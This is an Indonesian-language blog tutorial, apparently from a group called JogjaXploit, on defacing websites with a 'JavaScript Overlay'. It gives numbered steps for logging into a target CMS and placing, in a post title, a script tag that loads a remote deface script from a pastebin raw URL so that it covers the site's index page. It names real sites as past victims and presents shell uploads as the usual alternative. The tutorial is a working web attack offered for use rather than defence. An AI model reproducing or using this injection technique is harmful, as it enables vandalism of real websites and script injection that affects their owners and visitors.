Cara Menutup Index Dengan JS Overlay atau JSO


Cara menutup halaman index dengan JS Overlay atau JSO

Pada kesempatan ini, JogjaXploit akan membagikan tutorial mengenai Cara menutup Index dengan JavaScript Overlay atau yang disebut dengan JSO. Cara deface satu ini terbilang jarang digunakan tetapi teknik ini bisa digunakan sebagai alternatif terakhir jika kita gagal menanamkan shell pada target kita.

Terkadang sebuah website tidak support atau tidak mendukung file php (Walaupun ini masih bisa di atasi dengan cara Tamper Data), atau Website tersebut tidak menyediakan fasilitas upload. Cara yang bisa kita pakai adalah menutup halaman depan atau halaman index menggunakan sebuah “evil” javascript

Teknik deface satu ini pernah digunakan pada situs 1CAK, Babymetal, dan IPB yang berhasil di retas sistemnya. Sistem kerja metode ini berbeda dengan teknik deface yang di awali dengan mengupload shell. Jika shell diupload, maka biasanya script asli yang diganti. Namun untuk JS Overlay, halaman asli website tersebut “ditimpa” oleh halaman deface yang telah kita buat. Jadi halaman asli tersebut tetap ada namun ditutup oleh script deface kita. Caranya ? Sebelumnya kalian membutuhkan script deface yang sudah tertanam di web lain

Jika sebelumnya belum pernah melakukan deface, kalian bisa mengupload di hosting kalian. Ini hanya untuk memberikan umpan atau "pancingan" agar tampilan deface kita tampil di web target. Selain source script deface, kalian juga membutuhkan evil script yang tertanam di web lain, bisa diupload juga di pastebin

Untuk halaman defacement nya, pada kesempatan kali ini saya menggunakan script HTML yang sudah di mirrror ke zone-h.

Lalu Edit pada bagian : 

http://zonehmirrors.org/defaced/2016/10/22/msdental.com.br/msdental.com.br/k.php

Sebagai contohnya saja, Kali ini kita menggunakan target Lokomedia. Seharusnya bisa upload shell. namun sudah saya coba berulang ulang tetapi tidak bisa. Mungkin saja pihak Webmasternya sudah mengantisipasi hal tersebut. Oleh karena itu, saya akan coba menggunakan metode JS Overlay.

Sekarang kita mulai tutorialnya.

  1. Login ke Web Target Kalian
  2. Buat Post baru atau kalian bisa edit judul dari web tersebut
  3. Masukkan script ini pada bagian judul <script type="text/javascript" src="https://pastebin.com/raw/5YJdD7Bi"></script> Untuk tulisan warna merah ganti dengan URL kalian sendiri ya
  4. Maksud dari langkah diatas yaitu kita memanggil script dari URL tersebut untuk menutupi halaman web yang mana akan kita deface
  5. Setelah di save, coba kalian buka website yang sudah kalian tanam script JS Overlay tadi. Teknik ini bisa digunakan pada semua CMS atau Content Management System seperti Lokomedia, Joomla, Wordpress, dan lain-lain.
Kekurangan dari metode ini adalah, kita tidak memiliki akses ke server. Karena tidak adanya shell backdoor yang tertanam.

Mungkin cukup sekian yang dapat saya bagikan mengenai Cara menutup Halaman Index dengan JS Overlay atau JSO. Sampai jumpa lagi dan Terima kasih.

2 Komentar

Silahkan Bertanya atau Beri Tanggapannya, Terima Kasih

Posting Komentar

Silahkan Bertanya atau Beri Tanggapannya, Terima Kasih

Post a Comment

Lebih baru Lebih lama

ads

ads